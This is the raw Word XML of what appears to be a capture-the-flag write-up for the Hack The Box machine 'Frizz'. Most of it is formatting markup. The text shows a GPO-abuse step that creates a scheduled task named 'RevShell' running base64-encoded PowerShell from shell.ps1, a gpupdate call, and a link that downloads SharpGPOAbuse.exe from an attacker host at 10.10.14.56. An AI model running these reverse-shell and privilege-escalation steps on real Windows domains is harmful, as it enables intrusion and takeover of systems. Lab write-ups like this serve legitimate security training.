          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ame </w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>evShell</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00FC398A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command “powershell.exe” - -</w:t>
      </w:r>
      <w:r w:rsidR="009F0A1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rguments </w:t>
      </w:r>
      <w:r w:rsidR="00C35232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="002749AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-enc paste</w:t>
      </w:r>
      <w:r w:rsidR="00C35232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = here paste is the base64 of shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091EFE8" w14:textId="6AE41BED" w:rsidR="002749AD" w:rsidRDefault="002749A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9F0A1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gpupdate /force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C26424B" w14:textId="2A2138D2" w:rsidR="00814D72" w:rsidRDefault="00814D7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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7062CA0E" w14:textId="2C0972F1" w:rsidR="00814D72" w:rsidRDefault="00814D7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desktop we obtain the root.txt</w:t>
      </w:r>
      <w:r w:rsidR="00D153EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5A59A" w14:textId="77777777" w:rsidR="0056224F" w:rsidRDefault="0056224F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A16A87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4D869CB5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0DCBAF41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0C4DC158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5928B973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0622D10A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7D85F9D3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594C854A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5901EDE2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0E1704F9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73DF3177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59566E46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7231A358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408E4599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774C4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3B23DC46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755A67E2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1B753" w14:textId="77777777" w:rsidR="007A5B8F" w:rsidRDefault="007A5B8F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27514"/>
    <w:rsid w:val="00052843"/>
    <w:rsid w:val="00065D37"/>
    <w:rsid w:val="00074FEB"/>
    <w:rsid w:val="00080E89"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000E0BFA"/>
    <w:rsid w:val="000F3FC8"/>
    <w:rsid w:val="001A0F03"/>
    <w:rsid w:val="001A5490"/>
    <w:rsid w:val="001E1324"/>
    <w:rsid w:val="001E6AB6"/>
    <w:rsid w:val="00204816"/>
    <w:rsid w:val="002749AD"/>
    <w:rsid w:val="0027756A"/>
    <w:rsid w:val="0037224D"/>
    <w:rsid w:val="003A7096"/>
    <w:rsid w:val="003F7D28"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00494157"/>
    <w:rsid w:val="0056224F"/>
    <w:rsid w:val="005714C1"/>
    <w:rsid w:val="005C06BE"/>
    <w:rsid w:val="006117C0"/>
    <w:rsid w:val="0062510A"/>
    <w:rsid w:val="00656648"/>
    <w:rsid w:val="00696F9A"/>
    <w:rsid w:val="006B3794"/>
    <w:rsid w:val="006B48B1"/>
    <w:rsid w:val="00703261"/>
    <w:rsid w:val="00742B94"/>
    <w:rsid w:val="007A5B8F"/>
    <w:rsid w:val="00814D72"/>
    <w:rsid w:val="00831FE9"/>
    <w:rsid w:val="00835184"/>
    <w:rsid w:val="0083786D"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008C133E"/>
    <w:rsid w:val="008F0EB9"/>
    <w:rsid w:val="00953CB7"/>
    <w:rsid w:val="009826AF"/>
    <w:rsid w:val="009E6F0F"/>
    <w:rsid w:val="009F0A1B"/>
    <w:rsid w:val="00A111B9"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A36C79"/>
    <w:rsid w:val="00A43185"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A933C2"/>
    <w:rsid w:val="00A95EB7"/>
    <w:rsid w:val="00AA6103"/>
    <w:rsid w:val="00AE62F8"/>
    <w:rsid w:val="00B15D8D"/>
    <w:rsid w:val="00B25819"/>
    <w:rsid w:val="00BA59C3"/>
    <w:rsid w:val="00BC0B00"/>
    <w:rsid w:val="00BD28E3"/>
    <w:rsid w:val="00BF1F46"/>
    <w:rsid w:val="00C35232"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D153EB"/>
    <w:rsid w:val="00DD2399"/>
    <w:rsid w:val="00DD5F70"/>
    <w:rsid w:val="00E160AE"/>
    <w:rsid w:val="00E74F8D"/>
    <w:rsid w:val="00EC3E3D"/>
    <w:rsid w:val="00EF0761"/>
    <w:rsid w:val="00EF7F3C"/>
    <w:rsid w:val="00F1135E"/>
    <w:rsid w:val="00F55F5B"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F744CD"/>
    <w:rsid w:val="00FC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98A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E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0.10.14.56:8000/SharpGPOAbuse.exe%20-o%20SharpGPOAbuse.exe" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:m.schoolbus@frixxdc.frixx.htb" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:f.frizzle@frizzdc.frizz.ht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64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-26T06:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>